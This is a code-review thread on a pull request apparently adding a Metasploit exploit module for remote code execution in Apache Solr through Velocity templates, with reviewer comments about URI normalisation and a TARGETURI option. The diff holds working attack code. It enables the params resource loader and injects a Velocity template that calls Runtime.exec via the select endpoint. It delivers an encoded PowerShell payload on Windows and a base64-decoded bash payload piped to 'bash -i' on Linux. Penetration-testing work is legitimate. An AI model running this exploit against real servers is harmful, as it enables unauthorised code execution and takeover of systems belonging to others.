modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,377 @@
+      unless update_config.code == 200
+        fail_with Failure::UnexpectedReply, 'Unable to update config, exploit failed!'
+      end
+
+      print_good("params.resource.loader.enabled is now set to true!")
+    end
+
+    # windows...
+    if @target_platform.include? "Windows"
+      # if target is wrong, warn and exit before doing anything
+      unless target.name.include? "Windows"
+        fail_with Failure::NoTarget, 'Target is found to be Windows, please select the proper target!'
+      end
+
+      # exploiting for Windows relies heavily on PowerShell, so go find it first
+      # TODO: will CmdStager work if PowerShell not found?
+      psh_enum = execute_command("where powershell", {'core_name' => @core_name})
+      # abort the exploit if PowerShell was not found
+      unless (/powershell/i) =~ psh_enum.body.to_s
+        fail_with Failure::NoTarget, "PowerShell not found, aborting exploit attempt!"
+      end
+
+      vprint_good("PowerShell found at #{psh_enum.body.to_s.split('0  ')[1].strip}")
+      # generate PowerShell command, encode with base64, and remove comspec
+      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+      # prepare to exploit...
+      execute_command(psh_command, {'core_name' => @core_name})
+    end
+
+    # or unix-based?
+    if @target_platform.include? "Linux"
+      # if target is wrong, warn and exit before doing anything
+      unless target.name.include? "Unix"
+        fail_with Failure::NoTarget, 'Target is found to be Unix-based, please select the proper target!'
+      end
+
+      # base64 payload has to be URI encoded
+      b64_payload = Rex::Text.encode_base64(generate_payload().raw)
+      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
+      bash_payload = "bash -c {echo,#{b64_payload}}|{base64,-d}|{bash,-i}"
+      # prepare to exploit...
+      execute_command(bash_payload, {'core_name' => @core_name})
+    end
+  end
+
+  # sic 'em, bois!
+  def execute_command(cmd, opts = {})
+    # custom template which enables command execution. cmd must be uri-encoded, or the exploit fials
+    template = URI.encode('#set($x="")+' \
+    '#set($rt=$x.class.forName("java.lang.Runtime"))+' \
+    '#set($chr=$x.class.forName("java.lang.Character"))+' \
+    '#set($str=$x.class.forName("java.lang.String"))+' \
+    '#set($ex=$rt.getRuntime().exec("PAYLOAD_HERE"))+' \
+    '$ex.waitFor()+#set($out=$ex.getInputStream())+' \
+    '#foreach($i+in+[1..$out.available()])' \
+      '$str.valueOf($chr.toChars($out.read()))' \
+    '#end').gsub("PAYLOAD_HERE", Rex::Text.uri_encode(cmd))
+
+    # execute the exploit...
+    send_request_cgi({
+         'method'        => 'GET',
+         'encode_params' => false,
+         'uri'           => "/solr/#{opts['core_name']}/select",
```

Comment:
This should probably be normalized. Also, the module should probably expose a `TARGETURI` option.

```suggestion
         'uri'           => normalize_uri(target_uri.path, '/solr/', opts['core_name'].to_s, 'select'),
```

Reply:
Fixed in commit ce011375252e6b61502c7f33e58024e7fcbbf906.

Reply:
The module should probably expose a `TARGETURI` option, and `normalize_uri(target_uri.path, ...)` used for each `'uri'` key of each `send_request_cgi` call.

Presumably, `/solr/` would be a reasonable default for `TARGETURI`.

Reply:
Gah. Added TARGETURI option in commit 65e7354ee6a700f6da0846d4b4edacfefb090806.